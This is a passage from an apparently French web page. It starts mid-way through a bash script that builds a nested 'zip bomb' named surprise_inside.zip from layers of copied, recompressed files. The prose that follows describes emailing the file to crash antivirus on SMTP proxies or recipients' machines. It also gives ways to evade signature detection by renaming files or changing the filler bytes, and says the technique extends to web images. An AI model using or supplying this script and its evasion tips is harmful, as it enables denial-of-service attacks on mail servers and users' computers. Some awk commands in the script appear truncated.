cp fermion0.dll fermion`echo -e "x$((30+$i))"`.dll
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp fermion0.dll fermion`echo -e "x$((51+$i))"`.dll
i=$(($i+1))
done
echo "taille de chaque fichier fermion?.dll : `ls -alh fermion0.dll|awk '{print }'`"
echo
echo "création de la première occurence"
zip -R9 quark0.zip '*.dll' 1>/dev/null
rm -f *.dll
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp quark0.zip quark`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp quark0.zip quark`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier quark?.zip : `ls -alh quark0.zip|awk '{print }'`"
echo
echo "création de la deuxième occurence"
zip -R9 proton0.zip 'quark?.zip' 1>/dev/null
rm -f quark*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp proton0.zip proton`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp proton0.zip proton`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier proton?.zip : `ls -alh proton0.zip|awk '{print }'`"
echo
echo "création de la troisième occurence"
zip -R9 atome0.zip 'proton?.zip' 1>/dev/null
rm -f proton*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp atome0.zip atome`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp atome0.zip atome`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier atome?.zip : `ls -alh atome0.zip|awk '{print }'`"
echo
echo "création de la quatrième occurence"
zip -R9 molecule0.zip 'atome?.zip' 1>/dev/null
rm -f atome*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp molecule0.zip molecule`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp molecule0.zip molecule`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier molecule?.zip : `ls -alh molecule0.zip|awk '{print }'`"
echo
echo "création de la cinquième occurence"
zip -R9 adn0.zip 'molecule?.zip' 1>/dev/null
rm -f molecule*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp adn0.zip adn`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp adn0.zip adn`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier adn?.zip : `ls -alh adn0.zip|awk '{print }'`"
echo
echo "création du fichier final"
zip -R9 surprise_inside.zip 'adn?.zip' 1>/dev/null
rm -f adn*.zip
echo "taille du fichier surprise_inside.zip : `ls -alh surprise_inside.zip|awk '{print }'`"
echo


Ce genre de fichier est souvent envoyé en pièce jointe dans un mail dans le but de faire planter l’antivirus du proxy smtp, ceci dit si il arrive jusqu’à son correpondant il y a de fortes chances pour que ce soit carrément l’antivirus de celui-ci.

Certains antivirus peuvent détecter ce genre de bombe, enfin c’est le cas de Kaspersky je crois mais le principale problème c’est qu’il l’identifie sur la base d’une signature donc il suffit de changer le nom de fichiers ou de remplacer les 0 par un autre caractère pour qu’il ne les détecte plus. La solution serais d’analyser la taille possible de chacune des occurrences avant de les décompresser mais il faut croire que les éditeurs d’antivirus sont trop bêtes pour s’en rendre compte.

Je vous conseil de le mettre dans un espace que votre antivirus n’ira pas analyser si vous voulez éviter d’avoir votre disque saturé. et si vous vous l’envoyez par mail évitez d’activer l’analyse de mail en temps réel. Le fait de changer l’extension de fichier ne change pas grand-chose ; norton c’est fait baisé car il a vu que son contenu était un zip il a quand même voulu le dézipper pour analyse (ctrl-alt-suppr est mon ami).

Petit détail pour finir l’exemple que j’ai fait n’est qu’un exemple il existe d’autres types de fichiers ou l’on peut utiliser cette technique, cela peut être des image (gif png) ce qui sous entend que l’on peut se faire avoir en surfant sur un site ou ce type d’image est présent dans un page.
Pour connaître un tableau récapitulant les antivirus qui détectent ce genre de fichiers et les programmes plus ou moins vulnérables consultez cette page.         
ICI


Evitez de faire trop joujou avec ce genre de fichier cela pourrait se retourner contre vous
Salutation...

Haut de la page